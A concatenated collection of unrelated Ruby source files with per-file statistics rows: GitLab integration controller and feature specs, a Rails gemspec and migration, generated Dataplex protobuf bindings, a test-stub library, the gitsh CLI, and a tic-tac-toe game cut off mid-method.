put :test, params: project_params(service: integration_params)
expect(response).to be_successful
expect(json_response).to eq(
'error' => true,
'message' => 'Connection failed. Please check your settings.',
'service_response' => '',
'test_failed' => true
)
end
context 'with the Slack integration' do
let_it_be(:integration) { build(:integrations_slack) }
it 'returns an error response when the URL is blocked' do
put :test, params: project_params(service: { webhook: 'http://127.0.0.1' })
expect(response).to be_successful
expect(json_response).to eq(
'error' => true,
'message' => 'Connection failed. Please check your settings.',
'service_response' => "URL 'http://127.0.0.1' is blocked: Requests to localhost are not allowed",
'test_failed' => true
)
end
it 'returns an error response when a network exception is raised' do
expect_next(Integrations::Slack).to receive(:test).and_raise(Errno::ECONNREFUSED)
put :test, params: project_params
expect(response).to be_successful
expect(json_response).to eq(
'error' => true,
'message' => 'Connection failed. Please check your settings.',
'service_response' => 'Connection refused',
'test_failed' => true
)
end
end
end
end
describe 'PUT #update' do
describe 'as HTML' do
let(:integration_params) { { active: true } }
let(:params) { project_params(service: integration_params) }
let(:message) { 'Jira settings saved and active.' }
let(:redirect_url) { edit_project_service_path(project, integration) }
before do
stub_jira_integration_test
put :update, params: params
end
shared_examples 'integration update' do
it 'redirects to the correct url with a flash message' do
expect(response).to redirect_to(redirect_url)
expect(flash[:notice]).to eq(message)
end
end
context 'when param `active` is set to true' do
let(:params) { project_params(service: integration_params, redirect_to: redirect) }
context 'when redirect_to param is present' do
let(:redirect) { '/redirect_here' }
let(:redirect_url) { redirect }
it_behaves_like 'integration update'
end
context 'when redirect_to is an external domain' do
let(:redirect) { 'http://examle.com' }
it_behaves_like 'integration update'
end
context 'when redirect_to param is an empty string' do
let(:redirect) { '' }
it_behaves_like 'integration update'
end
end
context 'when param `active` is set to false' do
let(:integration_params) { { active: false } }
let(:message) { 'Jira settings saved, but not active.' }
it_behaves_like 'integration update'
end
context 'when param `inherit_from_id` is set to empty string' do
let(:integration_params) { { inherit_from_id: '' } }
it 'sets inherit_from_id to nil' do
expect(integration.reload.inherit_from_id).to eq(nil)
end
end
context 'when param `inherit_from_id` is set to an instance integration' do
let(:instance_integration) { create(:jira_integration, :instance, url: 'http://instance.com', password: 'instance') }
let(:integration_params) { { inherit_from_id: instance_integration.id, url: 'http://custom.com', password: 'custom' } }
it 'ignores submitted params and inherits instance settings' do
expect(integration.reload).to have_attributes(
inherit_from_id: instance_integration.id,
url: instance_integration.url,
password: instance_integration.password
)
end
end
context 'when param `inherit_from_id` is set to a group integration' do
let_it_be(:group) { create(:group) }
let_it_be(:project) { create(:project, group: group) }
let_it_be(:jira_integration) { create(:jira_integration, project: project) }
let(:group_integration) { create(:jira_integration, group: group, project: nil, url: 'http://group.com', password: 'group') }
let(:integration_params) { { inherit_from_id: group_integration.id, url: 'http://custom.com', password: 'custom' } }
it 'ignores submitted params and inherits group settings' do
expect(integration.reload).to have_attributes(
inherit_from_id: group_integration.id,
url: group_integration.url,
password: group_integration.password
)
end
end
context 'when param `inherit_from_id` is set to an unrelated group' do
let_it_be(:group) { create(:group) }
let(:group_integration) { create(:jira_integration, group: group, project: nil, url: 'http://group.com', password: 'group') }
let(:integration_params) { { inherit_from_id: group_integration.id, url: 'http://custom.com', password: 'custom' } }
it 'ignores the param and saves the submitted settings' do
expect(integration.reload).to have_attributes(
inherit_from_id: nil,
url: 'http://custom.com',
password: 'custom'
)
end
end
end
describe 'as JSON' do
before do
stub_jira_integration_test
put :update, params: project_params(service: integration_params, format: :json)
end
context 'when update succeeds' do
let(:integration_params) { { url: 'http://example.com', password: 'password' } }
it 'returns success response' do
expect(response).to be_successful
expect(json_response).to include(
'active' => true,
'errors' => {}
)
end
end
context 'when update fails with missing password' do
let(:integration_params) { { url: 'http://example.com' } }
it 'returns JSON response errors' do
expect(response).not_to be_successful
expect(json_response).to include(
'active' => true,
'errors' => {
'password' => ["can't be blank"]
}
)
end
end
context 'when update fails with invalid URL' do
let(:integration_params) { { url: '', password: 'password' } }
it 'returns JSON response with errors' do
expect(response).to have_gitlab_http_status(:unprocessable_entity)
expect(json_response).to include(
'active' => true,
'errors' => { 'url' => ['must be a valid URL', "can't be blank"] }
)
end
end
end
context 'with Prometheus integration' do
let_it_be(:prometheus_integration) { create(:prometheus_integration, project: project) }
let(:integration) { prometheus_integration }
let(:integration_params) { { manual_configuration: '1', api_url: 'http://example.com' } }
context 'when feature flag :settings_operations_prometheus_service is enabled' do
before do
stub_feature_flags(settings_operations_prometheus_service: true)
end
it 'redirects user back to edit page with alert' do
put :update, params: project_params.merge(service: integration_params)
expect(response).to redirect_to(edit_project_service_path(project, integration))
expected_alert = [
"You can now manage your Prometheus settings on the",
%(<a href="#{project_settings_operations_path(project)}">Operations</a> page.),
"Fields on this page have been deprecated."
].join(' ')
expect(controller).to set_flash.now[:alert].to(expected_alert)
end
it 'does not modify integration' do
expect { put :update, params: project_params.merge(service: integration_params) }
.not_to change { project.prometheus_integration.reload.attributes }
end
end
context 'when feature flag :settings_operations_prometheus_service is disabled' do
before do
stub_feature_flags(settings_operations_prometheus_service: false)
end
it 'modifies integration' do
expect { put :update, params: project_params.merge(service: integration_params) }
.to change { project.prometheus_integration.reload.attributes }
end
end
end
end
describe 'GET #edit' do
context 'with Jira service' do
let(:integration_param) { 'jira' }
before do
get :edit, params: project_params(id: integration_param)
end
context 'with approved services' do
it 'renders edit page' do
expect(response).to be_successful
end
end
end
context 'with Prometheus service' do
let(:integration_param) { 'prometheus' }
context 'when feature flag :settings_operations_prometheus_service is enabled' do
before do
stub_feature_flags(settings_operations_prometheus_service: true)
get :edit, params: project_params(id: integration_param)
end
it 'renders deprecation warning notice' do
expected_alert = [
"You can now manage your Prometheus settings on the",
%(<a href="#{project_settings_operations_path(project)}">Operations</a> page.),
"Fields on this page have been deprecated."
].join(' ')
expect(controller).to set_flash.now[:alert].to(expected_alert)
end
end
context 'when feature flag :settings_operations_prometheus_service is disabled' do
before do
stub_feature_flags(settings_operations_prometheus_service: false)
get :edit, params: project_params(id: integration_param)
end
it 'does not render deprecation warning notice' do
expect(controller).not_to set_flash.now[:alert]
end
end
end
end
private
def project_params(opts = {})
opts.reverse_merge(
namespace_id: project.namespace,
project_id: project,
id: integration.to_param
)
end
end
| 33.322506 | 133 | 0.628464 |
e2993733ce1dd6e539b05ab3ba906585a49f78f8 | 1,079 | # frozen_string_literal: true
require 'application_system_test_case'
module Spina
module Admin
module Journal
class JournalsTest < ApplicationSystemTestCase
setup do
@journal = spina_admin_journal_journals :journal
authenticate
end
test 'updating the journal' do
visit edit_admin_journal_journal_path(@journal)
assert_selector '.breadcrumbs' do
assert_text @journal.name
end
fill_in 'journal_name', with: 'New journal name'
click_on 'Save journal'
assert_text 'Journal saved'
end
test 'destroying the journal' do
visit edit_admin_journal_journal_path(@journal)
accept_alert do
click_on 'Permanently delete'
end
# find '#overlay', visible: true, style: { display: 'block' }
# assert_text "Are you sure you want to delete the journal #{@journal.name}?"
# click_on 'Yes, I\'m sure'
assert_text 'Journal deleted'
end
end
end
end
end
| 28.394737 | 87 | 0.618165 |
183c5e45a41a7d8d6c4be8c7ac4ab49d4b1c0434 | 567 | require 'spec_helper'
describe Array do
describe '#indent' do
subject { ["root:", " indented:"] }
it "prepends each element with spaces" do
expect(subject.indent 2).to eq [" root:", " indented:"]
end
context "when offset is 0" do
it "returns the array as is" do
expect(subject.indent 0).to eq subject
end
end
end
describe '#nonuniq' do
subject { %w[one it it two works three works] }
it "returns an array of non unique elements" do
expect(subject.nonuniq).to eq %w[it works]
end
end
end
| 23.625 | 65 | 0.622575 |
e8e186cc37a7c1bf00780b04e4aba8650307ea6c | 178 | # frozen_string_literal: true
class AddSpecialToDomainTags < ActiveRecord::Migration[5.2]
def change
add_column :domain_tags, :special, :boolean, default: false
end
end
| 22.25 | 63 | 0.769663 |
e9acdc1d0824a6fb746ed1c397425f032e0e8f37 | 1,520 | # encoding: utf-8
$:.unshift File.expand_path('../lib', __FILE__)
require 'comfortable_mexican_sofa/version'
Gem::Specification.new do |s|
s.name = "comfortable_mexican_sofa"
s.version = ComfortableMexicanSofa::VERSION
s.authors = ["Oleg Khabarov"]
s.email = ["[email protected]"]
s.homepage = "http://github.com/comfy/comfortable-mexican-sofa"
s.summary = "Rails 4 CMS Engine"
s.description = "ComfortableMexicanSofa is a powerful Rails 4 CMS Engine"
s.license = 'MIT'
s.files = `git ls-files`.split("\n")
s.platform = Gem::Platform::RUBY
s.require_paths = ['lib']
s.required_ruby_version = '>= 1.9.3'
s.add_dependency 'rails', '>= 4.0.0', '< 5'
s.add_dependency 'rails-i18n', '>= 4.0.0'
s.add_dependency 'bootstrap_form', '>= 2.2.0'
s.add_dependency 'active_link_to', '>= 1.0.0'
s.add_dependency 'paperclip', '>= 4.0.0'
s.add_dependency 'kramdown', '>= 1.0.0'
s.add_dependency 'jquery-rails', '>= 3.0.0'
s.add_dependency 'jquery-ui-rails', '>= 5.0.0'
s.add_dependency 'haml-rails', '>= 0.3.0'
s.add_dependency 'sass-rails', '>= 4.0.3'
s.add_dependency 'coffee-rails', '>= 3.1.0'
s.add_dependency 'codemirror-rails', '>= 3.0.0'
s.add_dependency 'kaminari', '>= 0.14.0'
s.add_dependency 'tinymce-rails', '>= 4.0.0'
s.add_dependency 'bootstrap-sass', '>= 3.2.0'
s.add_dependency 'plupload-rails', '>= 1.2.1'
end
| 38.974359 | 77 | 0.597368 |
f8da1d67f2f839a83915272820d2092064dadccf | 12,472 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/dataplex/v1/metadata.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
require 'google/api/client_pb'
require 'google/api/field_behavior_pb'
require 'google/api/resource_pb'
require 'google/protobuf/empty_pb'
require 'google/protobuf/timestamp_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/cloud/dataplex/v1/metadata.proto", :syntax => :proto3) do
add_message "google.cloud.dataplex.v1.CreateEntityRequest" do
optional :parent, :string, 1
optional :entity, :message, 3, "google.cloud.dataplex.v1.Entity"
optional :validate_only, :bool, 4
end
add_message "google.cloud.dataplex.v1.UpdateEntityRequest" do
optional :entity, :message, 2, "google.cloud.dataplex.v1.Entity"
optional :validate_only, :bool, 3
end
add_message "google.cloud.dataplex.v1.DeleteEntityRequest" do
optional :name, :string, 1
optional :etag, :string, 2
end
add_message "google.cloud.dataplex.v1.ListEntitiesRequest" do
optional :parent, :string, 1
optional :view, :enum, 2, "google.cloud.dataplex.v1.ListEntitiesRequest.EntityView"
optional :page_size, :int32, 3
optional :page_token, :string, 4
optional :filter, :string, 5
end
add_enum "google.cloud.dataplex.v1.ListEntitiesRequest.EntityView" do
value :ENTITY_VIEW_UNSPECIFIED, 0
value :TABLES, 1
value :FILESETS, 2
end
add_message "google.cloud.dataplex.v1.ListEntitiesResponse" do
repeated :entities, :message, 1, "google.cloud.dataplex.v1.Entity"
optional :next_page_token, :string, 2
end
add_message "google.cloud.dataplex.v1.GetEntityRequest" do
optional :name, :string, 1
optional :view, :enum, 2, "google.cloud.dataplex.v1.GetEntityRequest.EntityView"
end
add_enum "google.cloud.dataplex.v1.GetEntityRequest.EntityView" do
value :ENTITY_VIEW_UNSPECIFIED, 0
value :BASIC, 1
value :SCHEMA, 2
value :FULL, 4
end
add_message "google.cloud.dataplex.v1.ListPartitionsRequest" do
optional :parent, :string, 1
optional :page_size, :int32, 2
optional :page_token, :string, 3
optional :filter, :string, 4
end
add_message "google.cloud.dataplex.v1.CreatePartitionRequest" do
optional :parent, :string, 1
optional :partition, :message, 3, "google.cloud.dataplex.v1.Partition"
optional :validate_only, :bool, 4
end
add_message "google.cloud.dataplex.v1.DeletePartitionRequest" do
optional :name, :string, 1
optional :etag, :string, 2
end
add_message "google.cloud.dataplex.v1.ListPartitionsResponse" do
repeated :partitions, :message, 1, "google.cloud.dataplex.v1.Partition"
optional :next_page_token, :string, 2
end
add_message "google.cloud.dataplex.v1.GetPartitionRequest" do
optional :name, :string, 1
end
add_message "google.cloud.dataplex.v1.Entity" do
optional :name, :string, 1
optional :display_name, :string, 2
optional :description, :string, 3
optional :create_time, :message, 5, "google.protobuf.Timestamp"
optional :update_time, :message, 6, "google.protobuf.Timestamp"
optional :id, :string, 7
optional :etag, :string, 8
optional :type, :enum, 10, "google.cloud.dataplex.v1.Entity.Type"
optional :asset, :string, 11
optional :data_path, :string, 12
optional :data_path_pattern, :string, 13
optional :catalog_entry, :string, 14
optional :system, :enum, 15, "google.cloud.dataplex.v1.StorageSystem"
optional :format, :message, 16, "google.cloud.dataplex.v1.StorageFormat"
optional :compatibility, :message, 19, "google.cloud.dataplex.v1.Entity.CompatibilityStatus"
optional :schema, :message, 50, "google.cloud.dataplex.v1.Schema"
end
add_message "google.cloud.dataplex.v1.Entity.CompatibilityStatus" do
optional :hive_metastore, :message, 1, "google.cloud.dataplex.v1.Entity.CompatibilityStatus.Compatibility"
optional :bigquery, :message, 2, "google.cloud.dataplex.v1.Entity.CompatibilityStatus.Compatibility"
end
add_message "google.cloud.dataplex.v1.Entity.CompatibilityStatus.Compatibility" do
optional :compatible, :bool, 1
optional :reason, :string, 2
end
add_enum "google.cloud.dataplex.v1.Entity.Type" do
value :TYPE_UNSPECIFIED, 0
value :TABLE, 1
value :FILESET, 2
end
add_message "google.cloud.dataplex.v1.Partition" do
optional :name, :string, 1
repeated :values, :string, 2
optional :location, :string, 3
optional :etag, :string, 4
end
add_message "google.cloud.dataplex.v1.Schema" do
optional :user_managed, :bool, 1
repeated :fields, :message, 2, "google.cloud.dataplex.v1.Schema.SchemaField"
repeated :partition_fields, :message, 3, "google.cloud.dataplex.v1.Schema.PartitionField"
optional :partition_style, :enum, 4, "google.cloud.dataplex.v1.Schema.PartitionStyle"
end
add_message "google.cloud.dataplex.v1.Schema.SchemaField" do
optional :name, :string, 1
optional :description, :string, 2
optional :type, :enum, 3, "google.cloud.dataplex.v1.Schema.Type"
optional :mode, :enum, 4, "google.cloud.dataplex.v1.Schema.Mode"
repeated :fields, :message, 10, "google.cloud.dataplex.v1.Schema.SchemaField"
end
add_message "google.cloud.dataplex.v1.Schema.PartitionField" do
optional :name, :string, 1
optional :type, :enum, 2, "google.cloud.dataplex.v1.Schema.Type"
end
add_enum "google.cloud.dataplex.v1.Schema.Type" do
value :TYPE_UNSPECIFIED, 0
value :BOOLEAN, 1
value :BYTE, 2
value :INT16, 3
value :INT32, 4
value :INT64, 5
value :FLOAT, 6
value :DOUBLE, 7
value :DECIMAL, 8
value :STRING, 9
value :BINARY, 10
value :TIMESTAMP, 11
value :DATE, 12
value :TIME, 13
value :RECORD, 14
value :NULL, 100
end
add_enum "google.cloud.dataplex.v1.Schema.Mode" do
value :MODE_UNSPECIFIED, 0
value :REQUIRED, 1
value :NULLABLE, 2
value :REPEATED, 3
end
add_enum "google.cloud.dataplex.v1.Schema.PartitionStyle" do
value :PARTITION_STYLE_UNSPECIFIED, 0
value :HIVE_COMPATIBLE, 1
end
add_message "google.cloud.dataplex.v1.StorageFormat" do
optional :format, :enum, 1, "google.cloud.dataplex.v1.StorageFormat.Format"
optional :compression_format, :enum, 2, "google.cloud.dataplex.v1.StorageFormat.CompressionFormat"
optional :mime_type, :string, 3
oneof :options do
optional :csv, :message, 10, "google.cloud.dataplex.v1.StorageFormat.CsvOptions"
optional :json, :message, 11, "google.cloud.dataplex.v1.StorageFormat.JsonOptions"
end
end
add_message "google.cloud.dataplex.v1.StorageFormat.CsvOptions" do
optional :encoding, :string, 1
optional :header_rows, :int32, 2
optional :delimiter, :string, 3
optional :quote, :string, 4
end
add_message "google.cloud.dataplex.v1.StorageFormat.JsonOptions" do
optional :encoding, :string, 1
end
add_enum "google.cloud.dataplex.v1.StorageFormat.Format" do
value :FORMAT_UNSPECIFIED, 0
value :PARQUET, 1
value :AVRO, 2
value :ORC, 3
value :CSV, 100
value :JSON, 101
value :IMAGE, 200
value :AUDIO, 201
value :VIDEO, 202
value :TEXT, 203
value :TFRECORD, 204
value :OTHER, 1000
value :UNKNOWN, 1001
end
add_enum "google.cloud.dataplex.v1.StorageFormat.CompressionFormat" do
value :COMPRESSION_FORMAT_UNSPECIFIED, 0
value :GZIP, 2
value :BZIP2, 3
end
add_enum "google.cloud.dataplex.v1.StorageSystem" do
value :STORAGE_SYSTEM_UNSPECIFIED, 0
value :CLOUD_STORAGE, 1
value :BIGQUERY, 2
end
end
end
module Google
module Cloud
module Dataplex
module V1
CreateEntityRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.CreateEntityRequest").msgclass
UpdateEntityRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.UpdateEntityRequest").msgclass
DeleteEntityRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.DeleteEntityRequest").msgclass
ListEntitiesRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.ListEntitiesRequest").msgclass
ListEntitiesRequest::EntityView = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.ListEntitiesRequest.EntityView").enummodule
ListEntitiesResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.ListEntitiesResponse").msgclass
GetEntityRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.GetEntityRequest").msgclass
GetEntityRequest::EntityView = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.GetEntityRequest.EntityView").enummodule
ListPartitionsRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.ListPartitionsRequest").msgclass
CreatePartitionRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.CreatePartitionRequest").msgclass
DeletePartitionRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.DeletePartitionRequest").msgclass
ListPartitionsResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.ListPartitionsResponse").msgclass
GetPartitionRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.GetPartitionRequest").msgclass
Entity = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Entity").msgclass
Entity::CompatibilityStatus = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Entity.CompatibilityStatus").msgclass
Entity::CompatibilityStatus::Compatibility = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Entity.CompatibilityStatus.Compatibility").msgclass
Entity::Type = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Entity.Type").enummodule
Partition = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Partition").msgclass
Schema = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Schema").msgclass
Schema::SchemaField = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Schema.SchemaField").msgclass
Schema::PartitionField = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Schema.PartitionField").msgclass
Schema::Type = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Schema.Type").enummodule
Schema::Mode = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Schema.Mode").enummodule
Schema::PartitionStyle = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Schema.PartitionStyle").enummodule
StorageFormat = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.StorageFormat").msgclass
StorageFormat::CsvOptions = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.StorageFormat.CsvOptions").msgclass
StorageFormat::JsonOptions = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.StorageFormat.JsonOptions").msgclass
StorageFormat::Format = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.StorageFormat.Format").enummodule
StorageFormat::CompressionFormat = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.StorageFormat.CompressionFormat").enummodule
StorageSystem = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.StorageSystem").enummodule
end
end
end
end
| 51.53719 | 187 | 0.723942 |
08d0a73ec7eb055a0c1863d51d7bde9e8f7f3045 | 3,375 | module Stubby
mattr_accessor :base_definitions, :instance_definitions
@@base_definitions = {}
@@instance_definitions = {}
class << self
def included(base)
base.after :each do Stubby::Instances.clear! end
end
def base_definition(name)
name = name.name.demodulize if name.is_a? Class
@@base_definitions[name]
end
def instance_definitions(name)
@@instance_definitions[name] ||= {}
end
end
class Definition
cattr_accessor :directory
attr_reader :name, :class, :original_class, :base_class, :methods
attr_accessor :default_instance_key
def initialize(attributes = {})
attributes.each{|name, value| instance_variable_set :"@#{name}", value }
register
end
def register
if base_class == Stub
Stubby.base_definitions[key] = self
else
base_definition.default_instance_key ||= instance_key
Stubby.instance_definitions(base_key)[instance_key] = self
end
end
def name
@name ||= original_class.name if original_class
@name
end
def base_class
@base_class ||= Stub
end
def base_key
@base_key ||= base_class.name.demodulize
end
def base_definition
@base_definition ||= Stubby.base_definitions[base_key]
end
def instance_definitions
Stubby.instance_definitions(key)
end
def instance_definition(instance_key)
Stubby.instance_definitions(key)[instance_key]
end
def key
@key ||= name.to_s.classify.sub('::', '')
end
def instance_key
@instance_key ||= name.demodulize.underscore.to_sym
end
def original_class
@original_class ||= base_class.original_class if base_class
@original_class
end
def methods
@methods ||= {}
end
def create!(&block)
@class = ClassFactory.create(base_class, name, original_class, methods, &block)
end
def instantiate(key = nil)
if key == :all
instance_definitions.collect{|key, definition| definition.instantiate }
elsif key
key = default_instance_key if key == :first
instance_definition(key).instantiate
else
Instances.by_key(base_class)[instance_key] or
Instances.store(base_class, self.class.new, instance_key)
end
end
module Loader
class << self
def define(original_class, &block)
definition = Definition.new :original_class => original_class
definition.create! &block
end
def instance(klass, *args)
klass = Stubby.base_definition(klass).class
definition = Definition.new :base_class => klass,
:methods => args.extract_options!,
:name => args.shift.to_s.camelize
definition.create!
end
def load
unless @loaded
Dir["#{Stubby::Definition.directory}/**/*.rb"].each do |filename|
instance_eval IO.read(filename), filename
end
end
@loaded = true
end
end
end
end
end | 27 | 86 | 0.578667 |
912398725863ae843282fa115335662c473f6b0a | 2,830 | require 'readline'
require 'optparse'
require 'gitsh/completer'
require 'gitsh/environment'
require 'gitsh/history'
require 'gitsh/interpreter'
require 'gitsh/prompter'
require 'gitsh/version'
module Gitsh
class CLI
EX_OK = 0
EX_USAGE = 64
def initialize(opts={})
interpreter_factory = opts.fetch(:interpreter_factory, Interpreter)
@env = opts.fetch(:env, Environment.new)
@interpreter = interpreter_factory.new(@env)
@readline = ReadlineBlankFilter.new(opts.fetch(:readline, Readline))
@unparsed_args = opts.fetch(:args, ARGV).clone
@history = opts.fetch(:history, History.new(@env, @readline))
end
def run
parse_arguments
if unparsed_args.any?
exit_with_usage_message
else
run_interactive
end
end
private
attr_reader :env, :readline, :unparsed_args, :interpreter, :history
def run_interactive
history.load
setup_readline
greet_user
interactive_loop
ensure
history.save
end
def setup_readline
readline.completion_append_character = nil
readline.completion_proc = Completer.new(readline, env)
end
def interactive_loop
while command = read_command
interpreter.execute(command)
end
env.print "\n"
rescue Interrupt
env.print "\n"
retry
end
def read_command
command = readline.readline(prompt, true)
if command && command.empty?
env.fetch('gitsh.defaultCommand', 'status')
else
command
end
end
def prompt
prompter.prompt
end
def prompter
@prompter ||= Prompter.new(env: env, color: color_support?)
end
def color_support?
output, error, exit_status = Open3.capture3('tput colors')
exit_status.success? && output.chomp.to_i > 0
end
def exit_with_usage_message
env.puts_error option_parser.banner
exit EX_USAGE
end
def parse_arguments
option_parser.parse!(unparsed_args)
rescue OptionParser::InvalidOption => err
unparsed_args.concat(err.args)
end
def option_parser
OptionParser.new do |opts|
opts.banner = 'usage: gitsh [--version] [-h | --help] [--git PATH]'
opts.on('--git [COMMAND]', 'Use the specified git command') do |git_command|
env.git_command = git_command
end
opts.on_tail('--version', 'Display the version and exit') do
env.puts VERSION
exit EX_OK
end
opts.on_tail('--help', '-h', 'Display this help message and exit') do
env.puts opts
exit EX_OK
end
end
end
def greet_user
unless env['gitsh.noGreeting'] == 'true'
env.puts "gitsh #{Gitsh::VERSION}\nType :exit to exit"
end
end
end
end
| 23.196721 | 84 | 0.636042 |
4a8db82cf33732624cf9e38320675fd588f3486b | 576 | require 'digest/sha1'
# @summary
# Hash a string as mysql's "PASSWORD()" function would do it
#
Puppet::Functions.create_function(:'mysql::password') do
# @param password
# Plain text password.
#
# @return hash
# The mysql password hash from the clear text password.
#
dispatch :password do
required_param 'String', :password
return_type 'String'
end
def password(password)
return '' if password.empty?
return password if password =~ %r{\*[A-F0-9]{40}$}
'*' + Digest::SHA1.hexdigest(Digest::SHA1.digest(password)).upcase
end
end
| 25.043478 | 70 | 0.675347 |
1c1e9a26ab02decf7d0b80646cbfde80e6023af8 | 2,939 | # frozen_string_literal: true
class Fisk
module Instructions
# Instruction PUNPCKHWD
forms = []
operands = []
encodings = []
# punpckhwd: mm, mm
operands << OPERAND_TYPES[54]
operands << OPERAND_TYPES[36]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
0,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0x69, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# punpckhwd: mm, m64
operands << OPERAND_TYPES[54]
operands << OPERAND_TYPES[18]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
operands[1].rex_value,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0x69, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# punpckhwd: xmm, xmm
operands << OPERAND_TYPES[23]
operands << OPERAND_TYPES[24]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_prefix buffer, operands, 0x66, true
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
0,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0x69, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# punpckhwd: xmm, m128
operands << OPERAND_TYPES[23]
operands << OPERAND_TYPES[25]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_prefix buffer, operands, 0x66, true
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
operands[1].rex_value,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0x69, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
PUNPCKHWD = Instruction.new("PUNPCKHWD", forms)
end
end
| 27.212963 | 51 | 0.541681 |
e277f67b6272ad91bf3c0dc1c952556ba9efcf93 | 1,389 | # Called within a class definition, establishes a containment
# relationship with another class
Puppet::Parser::Functions::newfunction(
:contain,
:arity => -2,
:doc => "Contain one or more classes inside the current class. If any of
these classes are undeclared, they will be declared as if called with the
`include` function. Accepts a class name, an array of class names, or a
comma-separated list of class names.
A contained class will not be applied before the containing class is
begun, and will be finished before the containing class is finished.
You must use the class's full name;
relative names are not allowed. In addition to names in string form,
you may also directly use Class and Resource Type values that are produced by
evaluating resource and relationship expressions.
The function returns an array of references to the classes that were contained thus
allowing the function call to `contain` to directly continue.
- Since 4.0.0 support for Class and Resource Type values, absolute names
- Since 4.7.0 an Array[Type[Class[n]]] is returned with all the contained classes
"
) do |classes|
# Call the 4.x version of this function in case 3.x ruby code uses this function
Puppet.warn_once(:deprecation, '3xfunction#contain', "Calling function_contain via the Scope class is deprecated. Use Scope#call_function instead")
call_function('contain', classes)
end
| 44.806452 | 149 | 0.781857 |
f86a1b8a0a4de59f3a1b5deb292c283c633a0f84 | 733 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'User activates JetBrains TeamCity CI' do
include_context 'project integration activation'
before do
stub_request(:post, /.*teamcity.example.com.*/)
end
it 'activates integration', :js do
visit_project_integration('JetBrains TeamCity')
check('Push')
check('Merge request')
fill_in('TeamCity server URL', with: 'http://teamcity.example.com')
fill_in('Build type', with: 'GitlabTest_Build')
fill_in('Username', with: 'user')
fill_in('Password', with: 'verySecret')
click_test_then_save_integration(expect_test_to_fail: false)
expect(page).to have_content('JetBrains TeamCity settings saved and active.')
end
end
| 28.192308 | 81 | 0.729877 |
e9bf13ae762bc9f0bdbfe55a90c568d0ca917316 | 1,458 | module TicTacToe
class Game
attr_reader :players, :board, :current_player, :other_player
def initialize(players, board=Board.new)
@players = players
@board = board
@current_player, @other_player = players.shuffle
end
def switch_players
@current_player, @other_player = @other_player, @current_player
end
def solicit_move
"#{current_player.name}: Enter a number between 1 and 9 to make your move"
end
def get_move(human_move = gets.chomp)
human_move_to_coordinate(human_move)
end
def human_move_to_coordinate(human_move)
mapping = {
"1" => [0, 0],
"2" => [1, 0],
"3" => [2, 0],
"4" => [0, 1],
"5" => [1, 1],
"6" => [2, 1],
